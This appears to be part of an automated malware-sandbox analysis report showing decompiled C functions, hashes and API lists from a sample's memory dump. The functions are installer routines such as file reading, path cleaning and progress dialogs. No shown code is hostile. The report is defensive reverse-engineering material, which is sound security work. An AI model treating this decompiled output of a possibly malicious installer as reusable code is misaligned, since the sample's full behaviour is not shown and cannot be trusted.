                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                    • String ID: ('B
                                    • API String ID: 1495540970-2332581011
                                    • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                    • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                    • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                    • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                    0x0040463d
                                    0x004046f3
                                    0x00000000
                                    0x004046f3
                                    0x0040464e
                                    0x00404652
                                    0x00000000
                                    0x0040466c
                                    0x0040466c
                                    0x00404675
                                    0x00000000
                                    0x00000000
                                    0x00404677
                                    0x00404683
                                    0x00404686
                                    0x00404686
                                    0x0040468c
                                    0x00404692
                                    0x00404692
                                    0x0040469e
                                    0x004046a4
                                    0x004046ab
                                    0x004046ae
                                    0x004046b1
                                    0x004046b3
                                    0x004046b3
                                    0x004046bb
                                    0x004046c1
                                    0x004046c1
                                    0x004046cb
                                    0x004046d0
                                    0x004046d3
                                    0x004046d8
                                    0x004046db
                                    0x004046db
                                    0x004046eb
                                    0x004046eb
                                    0x00000000
                                    0x004046ee

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                    • String ID:
                                    • API String ID: 2320649405-0
                                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                    • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                    • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                    0x004026ec
                                    0x004026ee
                                    0x004026f1
                                    0x004026f3
                                    0x004026f6
                                    0x004026fb
                                    0x004026ff
                                    0x00402702
                                    0x00402705
                                    0x00402c2a
                                    0x00402c2d
                                    0x0040270b
                                    0x0040270b
                                    0x00402712
                                    0x00402714
                                    0x00402714
                                    0x0040271a
                                    0x0040287e
                                    0x0040287e
                                    0x00402881
                                    0x00402886
                                    0x004015b6
                                    0x0040292e
                                    0x0040292e
                                    0x00000000
                                    0x00402720
                                    0x00402721
                                    0x0040272c
                                    0x0040272f
                                    0x0040273b
                                    0x0040273f
                                    0x004027d7
                                    0x004027ef
                                    0x004027ff
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00402745
                                    0x00402745
                                    0x00402748
                                    0x00402749
                                    0x0040274c
                                    0x00402751
                                    0x00402758
                                    0x00402760
                                    0x00000000
                                    0x00402766
                                    0x00402766
                                    0x0040276b
                                    0x00000000
                                    0x00402771
                                    0x00402771
                                    0x00402779
                                    0x0040277c
                                    0x0040277f
                                    0x0040283a
                                    0x00402841
                                    0x00402785
                                    0x0040278b
                                    0x00402797
                                    0x00402801
                                    0x00402801
                                    0x00402799
                                    0x00402799
                                    0x0040279c
                                    0x0040279e
                                    0x0040279e
                                    0x0040279e
                                    0x004027a1
                                    0x004027a6
                                    0x004027a9
                                    0x00000000
                                    0x00000000
                                    0x004027ab
                                    0x004027ae
                                    0x004027bc
                                    0x004027c2
                                    0x004027d0
                                    0x00000000
                                    0x004027d2
                                    0x00000000
                                    0x004027d2
                                    0x00000000
                                    0x004027d0
                                    0x0040279e
                                    0x00402804
                                    0x00402807
                                    0x00000000
                                    0x00402809
                                    0x0040280e
                                    0x0040284f
                                    0x00402871
                                    0x00402878
                                    0x0040285d
                                    0x0040285d
                                    0x00402860
                                    0x00402863
                                    0x00402866
                                    0x00402866
                                    0x00000000
                                    0x00402817
                                    0x00402817
                                    0x0040281a
                                    0x0040281d
                                    0x00402823
                                    0x00402827
                                    0x0040282a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040282a
                                    0x0040280e
                                    0x00402807
                                    0x0040277f
                                    0x0040276b
                                    0x00402760
                                    0x00000000
                                    0x0040282c
                                    0x0040282c
                                    0x0040282f
                                    0x00402838
                                    0x00000000
                                    0x0040272f
                                    0x0040271a
                                    0x00402c33
                                    0x00402c39

                                    APIs
                                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                    • String ID: 9
                                    • API String ID: 163830602-2366072709
                                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                    0x004068f1
                                    0x004068fa
                                    0x00406911
                                    0x00406911
                                    0x00406918
                                    0x00406924
                                    0x00406924
                                    0x00406927
                                    0x0040692a
                                    0x0040692f
                                    0x00406931
                                    0x0040693a
                                    0x0040693e
                                    0x0040695b
                                    0x00406963
                                    0x00406963
                                    0x00406968
                                    0x0040696a
                                    0x0040696d
                                    0x00406972
                                    0x00406973
                                    0x00406977
                                    0x00406977
                                    0x00406978
                                    0x0040697f
                                    0x00406981
                                    0x00406988
                                    0x00000000
                                    0x00000000
                                    0x00406990
                                    0x00406996
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406996
                                    0x0040699b

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Char$Next$Prev
                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 589700163-3083651966
                                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                    0x0040303d
                                    0x0040303f
                                    0x00403046
                                    0x00403049
                                    0x00403049
                                    0x0040304f
                                    0x00000000
                                    0x0040304f
                                    0x0040305d
                                    0x00000000
                                    0x00403060
                                    0x00403067
                                    0x00403073
                                    0x0040307b
                                    0x004030b9
                                    0x004030c2
                                    0x00000000
                                    0x004030c7
                                    0x00403084
                                    0x00403095
                                    0x00000000
                                    0x004030a3
                                    0x00403084
                                    0x004030cf

                                    APIs
                                    • DestroyWindow.USER32 ref: 00403049
                                    • GetTickCount.KERNEL32(00000000), ref: 00403067
                                    • wsprintfW.USER32 ref: 00403095
                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
                                      • Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                    • CreateDialogParamW.USER32 ref: 004030B9
                                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                      • Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                    • String ID: ... %d%%
                                    • API String ID: 722711167-2449383134
                                    • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                    • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                    0x00404f8d
                                    0x00404f9a
                                    0x00404fa0
                                    0x00404fde
                                    0x00404fde
                                    0x00404fed
                                    0x00404ff4
                                    0x00000000
                                    0x00404ff6
                                    0x00404fa2
                                    0x00404fb1
                                    0x00404fb9
                                    0x00404fbc
                                    0x00404fce
                                    0x00404fd4
                                    0x00404fdb
                                    0x00000000
                                    0x00404fdb
                                    0x00000000

                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                    • GetMessagePos.USER32 ref: 00404FA2
                                    • ScreenToClient.USER32(?,?), ref: 00404FBC
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Message$Send$ClientScreen
                                    • String ID: f
                                    • API String ID: 41195575-1993550816
                                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                    0x00402fa3
                                    0x00402fb1
                                    0x00402fb7
                                    0x00402fb7
                                    0x00402fc5
                                    0x00402fc7
                                    0x00402fd3
                                    0x00402fd8
                                    0x00402fda
                                    0x00402fda
                                    0x00402fe5
                                    0x00402ff5
                                    0x00403007
                                    0x00403007
                                    0x0040300f

                                    APIs
                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                    • wsprintfW.USER32 ref: 00402FE5
                                    • SetWindowTextW.USER32 ref: 00402FF5
                                    • SetDlgItemTextW.USER32 ref: 00403007
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
